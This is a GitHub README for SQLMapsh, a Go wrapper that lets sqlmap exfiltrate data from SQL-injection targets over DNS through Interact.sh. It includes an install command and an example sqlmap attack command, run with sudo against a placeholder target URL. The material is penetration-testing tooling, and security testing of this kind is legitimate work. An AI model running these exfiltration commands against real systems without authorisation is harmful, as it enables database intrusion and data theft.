https://github.com/unlock-security/sqlmapsh

SQLMap wrapper that lets you use Interact.sh as a DNS server for exfiltrating data with zero configuration

data-exfiltration detection dns-exfiltration exploitation golang interactsh oast oob pentesting pentesting-tool sqlmap

![SQLMap.sh](./pics/sqlmapsh.png)

[![Go Report Card](https://goreportcard.com/badge/github.com/unlock-security/sqlmapsh?style=for-the-badge)](https://goreportcard.com/report/github.com/unlock-security/sqlmapsh)
[![License](https://img.shields.io/github/license/unlock-security/sqlmapsh?style=for-the-badge&label=License)](https://github.com/unlock-security/sqlmapsh?tab=GPL-3.0-1-ov-file#readme)
[![GitHub release (latest by date)](https://img.shields.io/github/v/release/unlock-security/sqlmapsh?style=for-the-badge)](https://github.com/unlock-security/sqlmapsh/releases/latest)
[![Made by 🔓 Unlock Security](https://img.shields.io/badge/Made_by-🔓_Unlock_Security-blue.svg?style=for-the-badge)](https://www.unlock-security.it/?utm_source=github&utm_medium=repo&utm_campaign=sqlmapsh)

SQLMap.sh is a SQLMap wrapper that lets you use Interact.sh as a DNS server for exfiltrating data with zero configuration.

To use the SQLMap `--dns-domain` flag, you need to open port 53 to the internet so that SQLMap can run its own DNS server, and you need a properly configured domain. This is not always possible during a penetration test engagement, or maybe you just don't want to buy a domain for this.

SQLMap.sh solves this problem transparently. Just use it as if it were SQLMap and you are ready to exfiltrate data via DNS.

## Installation

Run the following command to install the latest version.

```sh
go install github.com/unlock-security/sqlmapsh@latest
```

## Usage

Just replace `sqlmap` with `sudo sqlmapsh` when you want to use SQLMap with data exfiltration via DNS.

> [!IMPORTANT]
> SQLMap requires root privileges to perform data exfiltration via DNS because it needs to bind its own DNS server locally on port 53.

For example:

```sh
$ sqlmap -u 'https://www.target.com/page=1' -p page --level=5 --risk=3 --technique=E --banner
```

Becomes:

```sh
$ sudo sqlmapsh -u 'https://www.target.com/page=1' -p page --level=5 --risk=3 --technique=E --banner
```

---

Made with 💙 by Unlock Security